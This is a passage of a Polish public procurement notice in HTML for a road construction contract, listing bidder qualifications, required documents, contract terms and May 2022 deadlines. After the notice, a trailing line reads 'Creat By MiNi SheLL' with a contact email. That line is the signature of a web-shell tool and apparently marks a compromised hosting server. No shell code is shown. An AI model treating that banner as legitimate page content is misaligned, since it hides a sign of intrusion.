z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 500 000,00 zł (słownie: pięćset tysięcy złotych 00/100).<br/>b) posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż <br/>500 000,00 zł (słownie: pięćset tysięcy złotych 00/100).<br/>7.1.4. Zdolności technicznej lub zawodowej.<br/>Zamawiający uzna powyższy warunek za spełniony, jeżeli:<br/>a) Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, <br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej:<br/>- dwie roboty budowlane w zakresie remontu, przebudowy, budowy dróg o wartości nie mniejszej niż 1 000 000,00 złotych brutto.<br/>b) Wykonawca wykaże, że dysponuje:<br/>- co najmniej jedną osobą zdolną do wykonywania zamówienia w szczególności osobą posiadającą kwalifikacje zawodowe, doświadczenie i wykształcenie wymagane przepisami ustawy Prawo budowlane, tj.: osobą, która będzie kierownikiem budowy posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej posiadającą:<br/>•	co najmniej 2-letnie doświadczenie zawodowe na stanowisku kierownika robót w specjalności drogowej;<br/>•	aktualne zaświadczenie o wpisie na listę odpowiednich izb samorządu zawodowego oraz ubezpieczenie od odpowiedzialności cywilnej. <br/>- co najmniej jedną osobą, która będzie pełnić funkcję kierownika robót instalacyjnych <br/>wod-kan. posiadającą:<br/>•	uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;<br/>•	co najmniej 2-letnie doświadczenie zawodowe na stanowisku kierownika robót sanitarnych;<br/>•	aktualne zaświadczenie o wpisie na listę odpowiednich izb samorządu zawodowego oraz ubezpieczenie od odpowiedzialności cywilnej.<br/>- co najmniej jedną osobą, która będzie pełnić funkcję kierownika robót elektrycznych posiadającą:<br/>•	uprawnienia budowlane do kierowania robotami elektrycznymi w specjalności instalacyjnej w zakresie instalacji, urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;<br/>•	co najmniej 2-letnie doświadczenie zawodowe na stanowisku kierownika robót elektrycznych;<br/>•	aktualne zaświadczenie o wpisie na listę odpowiednich izb samorządu zawodowego oraz ubezpieczenie od odpowiedzialności cywilnej. W zakresie wykazania posiadania wymaganych uprawnień, dopuszcza się odpowiadające im uprawnienia wydane obywatelom państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej, państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA), <br/>z zastrzeżeniem art. 12a Prawa budowlanego, ustawy z dnia 22 grudnia 2015 r. <br/>o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej ( Dz. U. z 2021 r., poz. 1646), oraz ustawy z dnia 15 grudnia 2000 r. <br/>o samorządach zawodowych architektów oraz inżynierów budownictwa <br/>( t.j. Dz. U. z 2019 r., poz. 1117 ). Zamawiający nie dopuszcza możliwości łączenia ww. uprawnień.<br/>- projektanta branży drogowej - jedna osoba, posiadająca uprawnienia do projektowania<br/>w specjalności drogowej;<br/>Pozostałe informacje zostały zawarte w Rozdziale VII SWZ <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">8.1.5. dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną w pkt. 7.1.3 lit a) SWZ - składane na wezwanie<br/>8.1.6. informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiąc przed jej złożeniem, zgodnie z wymaganiami określonymi <br/>w pkt 7.1.3 lit b) SWZ - składane na wezwanie<br/>8.1.7. wykaz robót budowlanych, odpowiadających wymaganiom określonym w pkt 7.1.4 a) SWZ, wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty na wzorze stanowiącym Załącznik Nr 6 do SWZ - składany na wezwanie<br/>8.1.8. wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia, uprawnień, oraz informacją o podstawie do dysponowania tymi osobami, spełniających wymagania określone w pkt 7.1.4 lit b) SWZ, na formularzu stanowiącym Załącznik Nr 5 do SWZ - składany na wezwanie<br/>8.1.9. oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej na formularzu stanowiącym załącznik nr 4 do SWZ - składane na wezwanie<br/>8.1.10. oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, <br/>o którym mowa w pkt 8.1.2 SWZ, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego; a w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby – również oświadczenia tego podmiotu o aktualności informacji zawartych w jego oświadczeniu, o którym mowa w pkt 8.1.2 - składane na wezwanie<br/>8.2. Dokumentów, o których mowa w pkt 8.1.4 – 8.1.10 SWZ. Zamawiający będzie żądał od wykonawcy na zasadach określonych w art. 274 ust. 1 ustawy, którego w ocenie Zamawiającego oferta zostanie oceniona najwyżej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">8.1. W celu potwierdzenia spełniania warunków udziału w postępowaniu, określonych <br/>w Rozdziale 7 oraz wykazania braku podstaw do wykluczenia, Wykonawcy muszą złożyć następujące oświadczenia i dokumenty:<br/>8.1.1. oświadczenie o spełnianiu warunków udziału w postępowaniu, na formularzu stanowiącym Załącznik Nr 2 do SWZ – składane wraz z ofertą przez wykonawcę;<br/>8.1.2. oświadczenie o braku podstaw do wykluczenia z postępowania, na formularzu stanowiącym Załącznik Nr 3 do SWZ – składane wraz z ofertą przez wykonawcę;<br/>8.1.3. w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, Wykonawca przedstawia, wraz z oświadczeniem, o którym mowa w pkt 8.1.1 i pkt 8.1.2 SWZ, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby. Zamawiający żąda również przedstawienia podmiotowego środka dowodowego o którym mowa w pkt. 8.1.4 SWZ dotyczącego tych podmiotów – składane wraz z ofertą.<br/>8.1.4. odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, sporządzony nie wcześniej niż 3 miesiące przed jego złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust 1 pkt 4 ustawy - składany<br/>na wezwanie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 7.4. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki<br/>określone w pkt 7.1.4 lit. a SWZ muszą spełniać ci z Wykonawców, którzy będą wykonywać<br/>czynności, co do których wymagane jest ww. doświadczenie; z tym, że w sytuacji, gdy każdy<br/>z wykonawców wspólnie ubiegających się o udzielenie zamówienia zamierza realizować<br/>roboty budowlane stanowiące przedmiot niniejszego zamówienia, każdy z nich musi wykazać, że zrealizował co najmniej 1 (jedną) robotę budowlaną, o której mowa w pkt 7.1.4 lit. a SWZ. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki, określone w pkt 7.1.3 lit. a i b oraz w pkt 7.1.4. lit. b SWZ Wykonawcy mogą spełniać łącznie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 15.3. Zamawiający przewiduje możliwość zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie wskazanym w projektowanych postanowieniach umowy – Załącznik nr 7 do SWZ.<br/>15.4. Wszelkie zmiany treści Umowy, wymagają aneksu sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-12 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/strzelce_wielkie</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-12 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-10</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com